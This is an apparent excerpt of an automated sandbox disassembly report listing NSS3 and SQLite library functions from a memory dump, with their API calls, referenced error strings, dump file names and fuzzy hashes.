                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D14E4,6C53CC70), ref: 6C588D47
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C588D98
                                                                                                                                                                                                                            • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                            • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                          • PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C588E7B
                                                                                                                                                                                                                          • htons.WSOCK32(?), ref: 6C588EDB
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C588F99
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C58910A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
                                                                                                                                                                                                                          • String ID: %u.%u.%u.%u
                                                                                                                                                                                                                          • API String ID: 1845059423-1542503432
                                                                                                                                                                                                                          • Opcode ID: 83dd3624b8c341a02775f9efacd2464bfc654c1991f4bb963fe33b5b24379e6c
                                                                                                                                                                                                                          • Instruction ID: eb8c0580ef87859266ca774d845ad184403f38d12f5aacbe7b3772044d59c109
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83dd3624b8c341a02775f9efacd2464bfc654c1991f4bb963fe33b5b24379e6c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA027A3190B2718FDB18CF19CC6876ABBB3EF82304F19825AD8915FA91C731E949C791
                                                                                                                                                                                                                          Function 6C40EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                          • String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
                                                                                                                                                                                                                          • API String ID: 3168844106-1126224928
                                                                                                                                                                                                                          • Opcode ID: d94b5641098191c70452d2b0a407c6182c02a7fdc09034f707d0e23a4b0198b2
                                                                                                                                                                                                                          • Instruction ID: 9dfea458652964e73a28854e03e335769df228a911e7d2507d7915e929b9aedd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d94b5641098191c70452d2b0a407c6182c02a7fdc09034f707d0e23a4b0198b2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A3729D70E452058FEB14CF69C480FAABBF1BF49308F1881BDD8159BB52D776A846CB94
                                                                                                                                                                                                                          Function 6C529C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcmp.VCRUNTIME140(?,00000000,6C3FC52B), ref: 6C529D53
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52A035
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C52A114
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: sqlite3_log$memcmp
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 717804543-598938438
                                                                                                                                                                                                                          • Opcode ID: b1d0a692fddf7eecc3e294a7704453a5486c4a982162ff8c8634db86f51754be
                                                                                                                                                                                                                          • Instruction ID: 723730643385e7fdf034668f1e6a0bccfa60947a629b804f28fd127659431238
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1d0a692fddf7eecc3e294a7704453a5486c4a982162ff8c8634db86f51754be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10228E71608741DFC704CF29C89062ABBE1BFCA344F148A2DE9DA97791E739E845CB42
                                                                                                                                                                                                                          Function 6C549D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6C408637,?,?), ref: 6C549E88
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6C408637), ref: 6C549ED6
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • database corruption, xrefs: 6C549ECA
                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C549EC0
                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C549ECF
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                          • API String ID: 912837312-598938438
                                                                                                                                                                                                                          • Opcode ID: 20f9ff51cb4854e3302fabfd79bf8d05abf8f2803fc9c8d736391a4e2029c0ee
                                                                                                                                                                                                                          • Instruction ID: 2033139a644dabc422c872015ab20d846e2e96aee2537cee0ac1a9855340675d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20f9ff51cb4854e3302fabfd79bf8d05abf8f2803fc9c8d736391a4e2029c0ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C681C131B012159FCB04CF6ACD82EDEB3FAAF89304B148529E809AB745E731ED55CB90
                                                                                                                                                                                                                          Function 6C557F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5581BC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                          • String ID: BINARY$out of memory
                                                                                                                                                                                                                          • API String ID: 2221118986-3971123528
                                                                                                                                                                                                                          • Opcode ID: adc490524459ab0239098d31e46cba62676770feff178ffe98c38120e3c9aa31
                                                                                                                                                                                                                          • Instruction ID: 0ed5863701637c5c72a672584e089f1493cc2ecf249ea2b58804f8b178949a15
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adc490524459ab0239098d31e46cba62676770feff178ffe98c38120e3c9aa31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3352CF71E15218DFDB04CF99C880BADBBB2FF48308F65816BD855AB751D730A856CB81
                                                                                                                                                                                                                          Function 6C4D9EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C4D9ED6
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                            • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6C4D9EE4
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4D9F38
                                                                                                                                                                                                                            • Part of subcall function 6C4DD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6C4D9F0B), ref: 6C4DD03B
                                                                                                                                                                                                                            • Part of subcall function 6C4DD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6C4DD04E
                                                                                                                                                                                                                            • Part of subcall function 6C4DD030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6C4DD07B
                                                                                                                                                                                                                            • Part of subcall function 6C4DD030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6C4DD08E
                                                                                                                                                                                                                            • Part of subcall function 6C4DD030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4DD09D
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4D9F49
                                                                                                                                                                                                                          • SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6C4D9F59
                                                                                                                                                                                                                            • Part of subcall function 6C4D9D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6C4D9C5B), ref: 6C4D9D82
                                                                                                                                                                                                                            • Part of subcall function 6C4D9D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6C4D9C5B), ref: 6C4D9DA9
                                                                                                                                                                                                                            • Part of subcall function 6C4D9D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6C4D9C5B), ref: 6C4D9DCE
                                                                                                                                                                                                                            • Part of subcall function 6C4D9D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6C4D9C5B), ref: 6C4D9E43
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4287675220-0
                                                                                                                                                                                                                          • Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
                                                                                                                                                                                                                          • Instruction ID: fea8f28a91cbcc80369498e61fa346335c3f96cf3b41b0e902ebc707644a4332
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4911D6B5E042015BF700EA659C30F9A7265AFA525DF16023CE809CBB40FF62F91582D2
                                                                                                                                                                                                                          Function 6C58CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C58D086
                                                                                                                                                                                                                          • PR_Malloc.NSS3(00000001), ref: 6C58D0B9
                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C58D138
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeMallocstrlen
                                                                                                                                                                                                                          • String ID: >
                                                                                                                                                                                                                          • API String ID: 1782319670-325317158
                                                                                                                                                                                                                          • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                          • Instruction ID: cef62ab82082335475fddaa55c317535556363524ee540be9272ef891a267cd6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BAD16972B436774BFB14987D8CA13EA77D38B82374F58032AD5618BBE5E6199843C311
                                                                                                                                                                                                                          Function 6C40AC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: 0Xl$PXl$pXl$winUnlock$winUnlockReadLock
                                                                                                                                                                                                                          • API String ID: 0-3763817051
                                                                                                                                                                                                                          • Opcode ID: 7088ccc27fe90d5873726d3a5a5a4b48720be22450160c65cc62ec0d325483da
                                                                                                                                                                                                                          • Instruction ID: 48ad99c0750d8f4597817bcaf4e03f55725078fa55e609bf122c209af3d47e92
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7088ccc27fe90d5873726d3a5a5a4b48720be22450160c65cc62ec0d325483da
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D8717C716083409BDB14CF28DC85AAABBF5FF89314F15C62DE9499B301D730AA85CBC5
                                                                                                                                                                                                                          Function 6C52AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 1cecf518bafca74904de9bd96cc99bef95e56c8a8cd82f5787ec9cfd917e542c
                                                                                                                                                                                                                          • Instruction ID: 836ad96ea5a50c7fb4aef73dec1f33f11bb3a9e6d67852c1fda76f81721511e6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cecf518bafca74904de9bd96cc99bef95e56c8a8cd82f5787ec9cfd917e542c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7BF1F671F016558FDB04CF69CC417AA77F1AB8A304F16422DC946EB780E7B8AA51CBC9
                                                                                                                                                                                                                          Function 6C51DFC0 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 344stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C3F5001,?,00000003,00000000), ref: 6C51DFD7
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,?,?,?,00000003,?,6C3F5001,?), ref: 6C51E2B7
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000028,00000003,?,?,?,?,?,?,00000003,?,6C3F5001,?), ref: 6C51E2DA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpymemsetstrlen
                                                                                                                                                                                                                          • String ID: W
                                                                                                                                                                                                                          • API String ID: 160209724-655174618
                                                                                                                                                                                                                          • Opcode ID: 8d8a25b09313a0bcd9d9c53de1a15b2119ab510cc03d27061d2e843315918798
                                                                                                                                                                                                                          • Instruction ID: 928a20beefbb27962e0d6a35d348482b702e9c327d5e9578a4ce0d7012e1e563
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d8a25b09313a0bcd9d9c53de1a15b2119ab510cc03d27061d2e843315918798
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4C12931A4D2558FFB04CE258C9C6AA77B2BF8A318F284569DC699BF41D7B1A801C7D0
                                                                                                                                                                                                                          Function 6C4E0E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C4E1052
                                                                                                                                                                                                                          • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C4E1086
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
